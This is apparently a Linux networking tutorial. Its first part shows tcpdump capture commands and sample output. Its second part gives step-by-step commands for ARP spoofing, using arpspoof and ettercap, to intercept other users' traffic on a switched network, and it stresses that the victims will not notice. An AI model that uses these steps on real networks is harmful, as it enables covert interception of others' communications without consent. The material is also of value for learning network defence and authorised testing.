Capture and read network traffic in Linux:
$ ip address show 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:0c:29:2c:c1:16 brd ff:ff:ff:ff:ff:ff inet 192.168.111.201/24 brd 192.168.111.255 scope global dynamic ens33 valid_lft 1691sec preferred_lft 1691sec inet6 fe80::20c:29ff:fe2c:c116/64 scope link valid_lft forever preferred_lft forever
tcpdumpfor your operating distribution.
$ sudo apt update && sudo apt install --assume-yes tcpdump # Ubuntu and Debian
tcpdumpagainst the network interface that you've selected.
$ sudo tcpdump --interface=ens33
$ sudo tcpdump --interface=ens33 host 192.168.111.2 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes 05:33:00.600161 IP host > _gateway: ICMP echo request, id 1625, seq 1, length 64 05:33:00.600286 IP _gateway > host: ICMP echo reply, id 1625, seq 1, length 64 05:33:00.602106 IP host.41923 > _gateway.domain: 57259+ PTR? 18.104.22.168.in-addr.arpa. (44) 05:33:00.616784 IP _gateway.domain > host.41923: 57259 NXDomain*- 0/0/0 (44)
$ sudo tcpdump --interface=ens33 host 192.168.111.2 -n tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes 05:35:13.914066 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 3, length 64 05:35:13.914414 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 3, length 64 05:35:14.937278 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 4, length 64 05:35:14.937723 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 4, length 64
$ sudo tcpdump --interface=ens33 port 80 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes 05:40:12.229010 IP host.53904 > _gateway.http: Flags [S], seq 908428722, win 64240, options [mss 1460,sackOK,TS val 3777051478 ecr 0,nop,wscale 7], length 0 05:40:12.229182 IP _gateway.http > host.53904: Flags [R.], seq 0, ack 908428723, win 32767, length 0
A network switch doesn’t foward packets to everyone in the network the same way as a network hub do, and so theoretically a person in the network cannot look at other person’s traffic. There are ways however to get through this problem, which is by performing arp spoofing.
This guide will just discuss how it is done without discussing the theory behind the process. To start is to install the necessary program, which is in this case is dsniff package which contains the arpspoof program that we need. In Ubuntu or any other Debian based distribution, it’s installable with the apt-get command as the following;
$ sudo apt install --assume-yes dsniff
To make sure the traffic is forwarded to the real destination as it reach our machine, the following command need to be run;
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
This will make sure the connection of the target machine is not disconnected, and nobody should realize what we’re doing.
The following command will tell the gateway “I am 192.168.0.100”, and the next command tells 192.168.0.100 “I am the gateway”
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
With this, all the traffic that’s supposed to go to the gateway from the machine, and the other way around, will go through our machine first, and only then forwarded to the real target. With this we can run any packet analysis tool such as tcpdump or wireshark.
There are programs however to make the whole process simpler. One of the favored program for this is ettercap. Ettercap can perform arp spoofing as well, among many other features that it has. In Ubuntu, the package is called ettercap-gtk;
$ sudo apt install --assume-yes ettercap-gtk
Running the program with the -G switch will run it in GTK rather than in ncurses.
$ sudo ettercap -G
At the menu, choose the following;
Sniff -> Unfied sniffing
And at the prompt, choose the network interface to be used. Normally it would be eth0
Network Interface: eth0
At the menu again, choose the following to add all hosts in the network to the list
Hosts -> Scan for hosts
And following the following will do the arp spoofing for everyone in the network
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
The following command will do the same thing as the above example, in one single command;
$ sudo ettercap -q -T -M arp // //